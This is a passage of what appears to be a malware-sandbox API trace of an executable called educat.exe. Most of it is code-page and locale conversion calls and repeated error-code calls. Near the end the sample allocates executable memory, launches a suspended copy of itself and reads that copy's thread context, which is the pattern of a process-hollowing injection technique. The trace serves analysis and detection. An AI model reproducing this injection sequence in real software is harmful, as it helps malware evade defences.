7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xff\xb7\x20\xb3\x94\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0044.568] GetLastError () returned 0xcb [0044.568] SetLastError (dwErrCode=0xcb) [0044.568] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0044.568] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0044.568] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0044.568] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0044.568] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x19fb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xff\xb7\x20\xb3\x94\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0044.568] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x50d980, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\educat.exe")) returned 0x28 [0044.568] GetLastError () returned 0x0 [0044.568] SetLastError (dwErrCode=0x0) [0044.568] GetLastError () returned 0x0 [0044.568] SetLastError (dwErrCode=0x0) [0044.568] GetLastError () returned 0x0 [0044.568] SetLastError (dwErrCode=0x0) [0044.568] GetLastError () returned 0x0 [0044.568] SetLastError (dwErrCode=0x0) [0044.568] GetLastError () returned 0x0 [0044.568] SetLastError (dwErrCode=0x0) [0044.568] GetLastError () returned 0x0 [0044.568] SetLastError (dwErrCode=0x0) [0044.568] GetLastError () returned 0x0 [0044.568] SetLastError (dwErrCode=0x0) [0044.568] GetLastError () returned 0x0 [0044.568] SetLastError (dwErrCode=0x0) [0044.569] GetLastError () returned 0x0 [0044.569] SetLastError (dwErrCode=0x0) [0044.569] GetLastError () returned 0x0 [0044.569] SetLastError (dwErrCode=0x0) [0044.569] GetLastError () returned 0x0 [0044.569] SetLastError (dwErrCode=0x0) [0044.569] GetLastError () returned 0x0 [0044.569] SetLastError (dwErrCode=0x0) [0044.569] GetLastError () returned 0x0 [0044.569] SetLastError (dwErrCode=0x0) [0044.569] GetLastError () returned 0x0 [0044.569] SetLastError (dwErrCode=0x0) [0044.569] GetLastError () returned 0x0 [0044.569] SetLastError (dwErrCode=0x0) [0044.569] GetLastError () returned 0x0 [0044.569] SetLastError (dwErrCode=0x0) [0044.569] GetLastError () returned 0x0 [0044.569] SetLastError (dwErrCode=0x0) [0044.569] GetLastError () returned 0x0 [0044.569] SetLastError (dwErrCode=0x0) [0044.569] GetLastError () returned 0x0 [0044.569] SetLastError (dwErrCode=0x0) [0044.569] GetLastError () returned 0x0 [0044.569] SetLastError (dwErrCode=0x0) [0044.569] GetLastError () returned 0x0 [0044.569] SetLastError (dwErrCode=0x0) [0044.569] GetLastError () returned 0x0 [0044.569] SetLastError (dwErrCode=0x0) [0044.569] GetLastError () returned 0x0 [0044.570] SetLastError (dwErrCode=0x0) [0044.570] GetLastError () returned 0x0 [0044.570] SetLastError (dwErrCode=0x0) [0044.570] GetLastError () returned 0x0 [0044.570] SetLastError (dwErrCode=0x0) [0044.570] GetLastError () returned 0x0 [0044.570] SetLastError (dwErrCode=0x0) [0044.570] GetLastError () returned 0x0 [0044.570] SetLastError (dwErrCode=0x0) [0044.570] GetLastError () returned 0x0 [0044.570] SetLastError (dwErrCode=0x0) [0044.570] GetLastError () returned 0x0 [0044.570] SetLastError (dwErrCode=0x0) [0044.570] GetLastError () returned 0x0 [0044.570] SetLastError (dwErrCode=0x0) [0044.570] GetLastError () returned 0x0 [0044.570] SetLastError (dwErrCode=0x0) [0044.570] GetLastError () returned 0x0 [0044.570] SetLastError (dwErrCode=0x0) [0044.570] GetLastError () returned 0x0 [0044.570] SetLastError (dwErrCode=0x0) [0044.570] GetLastError () returned 0x0 [0044.570] SetLastError (dwErrCode=0x0) [0044.570] GetLastError () returned 0x0 [0044.570] SetLastError (dwErrCode=0x0) [0044.570] GetLastError () returned 0x0 [0044.571] SetLastError (dwErrCode=0x0) [0044.571] GetLastError () returned 0x0 [0044.571] SetLastError (dwErrCode=0x0) [0044.571] GetLastError () returned 0x0 [0044.571] SetLastError (dwErrCode=0x0) [0044.571] GetLastError () returned 0x0 [0044.571] SetLastError (dwErrCode=0x0) [0044.571] GetLastError () returned 0x0 [0044.571] SetLastError (dwErrCode=0x0) [0044.571] GetLastError () returned 0x0 [0044.571] SetLastError (dwErrCode=0x0) [0044.571] GetLastError () returned 0x0 [0044.571] SetLastError (dwErrCode=0x0) [0044.571] GetLastError () returned 0x0 [0044.571] SetLastError (dwErrCode=0x0) [0044.571] GetLastError () returned 0x0 [0044.571] SetLastError (dwErrCode=0x0) [0044.571] GetLastError () returned 0x0 [0044.571] SetLastError (dwErrCode=0x0) [0044.571] GetLastError () returned 0x0 [0044.571] SetLastError (dwErrCode=0x0) [0044.571] GetLastError () returned 0x0 [0044.572] SetLastError (dwErrCode=0x0) [0044.572] GetLastError () returned 0x0 [0044.572] SetLastError (dwErrCode=0x0) [0044.572] GetLastError () returned 0x0 [0044.572] SetLastError (dwErrCode=0x0) [0044.572] GetLastError () returned 0x0 [0044.572] SetLastError (dwErrCode=0x0) [0044.572] GetLastError () returned 0x0 [0044.572] SetLastError (dwErrCode=0x0) [0044.572] GetLastError () returned 0x0 [0044.572] SetLastError (dwErrCode=0x0) [0044.572] GetLastError () returned 0x0 [0044.572] SetLastError (dwErrCode=0x0) [0044.573] GetLastError () returned 0x0 [0044.573] SetLastError (dwErrCode=0x0) [0044.573] GetLastError () returned 0x0 [0044.573] SetLastError (dwErrCode=0x0) [0044.573] GetLastError () returned 0x0 [0044.573] SetLastError (dwErrCode=0x0) [0044.573] GetLastError () returned 0x0 [0044.573] SetLastError (dwErrCode=0x0) [0044.573] GetLastError () returned 0x0 [0044.573] SetLastError (dwErrCode=0x0) [0044.573] GetLastError () returned 0x0 [0044.573] SetLastError (dwErrCode=0x0) [0044.573] GetLastError () returned 0x0 [0044.573] SetLastError (dwErrCode=0x0) [0044.573] GetLastError () returned 0x0 [0044.573] SetLastError (dwErrCode=0x0) [0044.573] GetLastError () returned 0x0 [0044.573] SetLastError (dwErrCode=0x0) [0044.573] GetLastError () returned 0x0 [0044.573] SetLastError (dwErrCode=0x0) [0044.573] GetLastError () returned 0x0 [0044.573] SetLastError (dwErrCode=0x0) [0044.573] GetLastError () returned 0x0 [0044.573] SetLastError (dwErrCode=0x0) [0044.573] GetLastError () returned 0x0 [0044.573] SetLastError (dwErrCode=0x0) [0044.573] GetLastError () returned 0x0 [0044.573] SetLastError (dwErrCode=0x0) [0044.573] GetLastError () returned 0x0 [0044.574] SetLastError (dwErrCode=0x0) [0044.574] GetLastError () returned 0x0 [0044.574] SetLastError (dwErrCode=0x0) [0044.574] GetLastError () returned 0x0 [0044.574] SetLastError (dwErrCode=0x0) [0044.574] GetLastError () returned 0x0 [0044.574] SetLastError (dwErrCode=0x0) [0044.574] GetLastError () returned 0x0 [0044.574] SetLastError (dwErrCode=0x0) [0044.574] GetLastError () returned 0x0 [0044.574] SetLastError (dwErrCode=0x0) [0044.574] GetLastError () returned 0x0 [0044.574] SetLastError (dwErrCode=0x0) [0044.574] GetLastError () returned 0x0 [0044.574] SetLastError (dwErrCode=0x0) [0044.574] GetLastError () returned 0x0 [0044.574] SetLastError (dwErrCode=0x0) [0044.574] GetLastError () returned 0x0 [0044.574] SetLastError (dwErrCode=0x0) [0044.574] GetLastError () returned 0x0 [0044.574] SetLastError (dwErrCode=0x0) [0044.574] GetLastError () returned 0x0 [0044.574] SetLastError (dwErrCode=0x0) [0044.574] GetLastError () returned 0x0 [0044.574] SetLastError (dwErrCode=0x0) [0044.574] GetLastError () returned 0x0 [0044.574] SetLastError (dwErrCode=0x0) [0044.574] GetLastError () returned 0x0 [0044.574] SetLastError (dwErrCode=0x0) [0044.576] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0044.576] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40c6c1) returned 0x0 [0044.576] GetLastError () returned 0x0 [0044.576] SetLastError (dwErrCode=0x0) [0044.576] GetLastError () returned 0x0 [0044.576] SetLastError (dwErrCode=0x0) [0044.576] GetLastError () returned 0x0 [0044.576] SetLastError (dwErrCode=0x0) [0044.576] GetLastError () returned 0x0 [0044.576] SetLastError (dwErrCode=0x0) [0044.576] GetLastError () returned 0x0 [0044.576] SetLastError (dwErrCode=0x0) [0044.576] GetLastError () returned 0x0 [0044.576] SetLastError (dwErrCode=0x0) [0044.576] GetLastError () returned 0x0 [0044.576] SetLastError (dwErrCode=0x0) [0044.576] GetLastError () returned 0x0 [0044.576] SetLastError (dwErrCode=0x0) [0044.577] GetLastError () returned 0x0 [0044.577] SetLastError (dwErrCode=0x0) [0044.577] GetLastError () returned 0x0 [0044.577] SetLastError (dwErrCode=0x0) [0044.577] GetLastError () returned 0x0 [0044.577] SetLastError (dwErrCode=0x0) [0044.577] GetLastError () returned 0x0 [0044.577] SetLastError (dwErrCode=0x0) [0044.577] GetLastError () returned 0x0 [0044.577] SetLastError (dwErrCode=0x0) [0044.577] GetLastError () returned 0x0 [0044.577] SetLastError (dwErrCode=0x0) [0044.577] GetLastError () returned 0x0 [0044.577] SetLastError (dwErrCode=0x0) [0044.577] GetLastError () returned 0x0 [0044.577] SetLastError (dwErrCode=0x0) [0044.577] GetLastError () returned 0x0 [0044.577] SetLastError (dwErrCode=0x0) [0044.577] GetLastError () returned 0x0 [0044.577] SetLastError (dwErrCode=0x0) [0044.577] GetLastError () returned 0x0 [0044.577] SetLastError (dwErrCode=0x0) [0044.577] GetLastError () returned 0x0 [0044.577] SetLastError (dwErrCode=0x0) [0044.577] GetLastError () returned 0x0 [0044.577] SetLastError (dwErrCode=0x0) [0044.577] GetLastError () returned 0x0 [0044.577] SetLastError (dwErrCode=0x0) [0044.577] GetLastError () returned 0x0 [0044.577] SetLastError (dwErrCode=0x0) [0044.577] GetLastError () returned 0x0 [0044.578] SetLastError (dwErrCode=0x0) [0044.578] GetLastError () returned 0x0 [0044.578] SetLastError (dwErrCode=0x0) [0044.578] GetLastError () returned 0x0 [0044.578] SetLastError (dwErrCode=0x0) [0044.578] GetLastError () returned 0x0 [0044.578] SetLastError (dwErrCode=0x0) [0044.578] GetLastError () returned 0x0 [0044.578] SetLastError (dwErrCode=0x0) [0044.578] GetLastError () returned 0x0 [0044.578] SetLastError (dwErrCode=0x0) [0044.578] GetLastError () returned 0x0 [0044.578] SetLastError (dwErrCode=0x0) [0044.578] GetLastError () returned 0x0 [0044.578] SetLastError (dwErrCode=0x0) [0044.578] GetLastError () returned 0x0 [0044.578] SetLastError (dwErrCode=0x0) [0044.578] GetLastError () returned 0x0 [0044.578] SetLastError (dwErrCode=0x0) [0044.578] GetLastError () returned 0x0 [0044.578] SetLastError (dwErrCode=0x0) [0044.578] GetLastError () returned 0x0 [0044.578] SetLastError (dwErrCode=0x0) [0044.578] GetLastError () returned 0x0 [0044.578] SetLastError (dwErrCode=0x0) [0044.578] GetLastError () returned 0x0 [0044.578] SetLastError (dwErrCode=0x0) [0044.578] GetLastError () returned 0x0 [0044.578] SetLastError (dwErrCode=0x0) [0044.578] GetLastError () returned 0x0 [0044.579] SetLastError (dwErrCode=0x0) [0044.579] GetLastError () returned 0x0 [0044.579] SetLastError (dwErrCode=0x0) [0044.579] GetLastError () returned 0x0 [0044.579] SetLastError (dwErrCode=0x0) [0044.579] GetLastError () returned 0x0 [0044.579] SetLastError (dwErrCode=0x0) [0047.530] GetProcAddress (hModule=0x75260000, lpProcName="VirtualAlloc") returned 0x75278b70 [0047.531] VirtualAlloc (lpAddress=0x0, dwSize=0xb09eb, flAllocationType=0x1000, flProtect=0x40) returned 0x1da0000 [0047.581] GetProcAddress (hModule=0x75260000, lpProcName="VirtualAlloc") returned 0x75278b70 [0047.581] GetProcAddress (hModule=0x75260000, lpProcName="ExitProcess") returned 0x752874f0 [0047.582] VirtualAlloc (lpAddress=0x0, dwSize=0x6e800, flAllocationType=0x1000, flProtect=0x40) returned 0x1e60000 [0047.596] VirtualAlloc (lpAddress=0x0, dwSize=0x1be0, flAllocationType=0x3000, flProtect=0x40) returned 0x3f0000 [0047.600] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x190ff8, nSize=0x103 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\educat.exe")) returned 0x28 [0047.600] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe\" " [0047.600] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe", lpCommandLine="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x190fa0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x191290 | out: lpCommandLine="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe\" ", lpProcessInformation=0x191290*(hProcess=0x17c, hThread=0x178, dwProcessId=0xda4, dwThreadId=0xda8)) returned 1 [0047.615] GetThreadContext (in: hThread=0x178, lpContext=0x190cb0 | out: lpContext=0x190cb0*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x40aa50, Ebp=0x0, Eip=0x77d0aef0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, 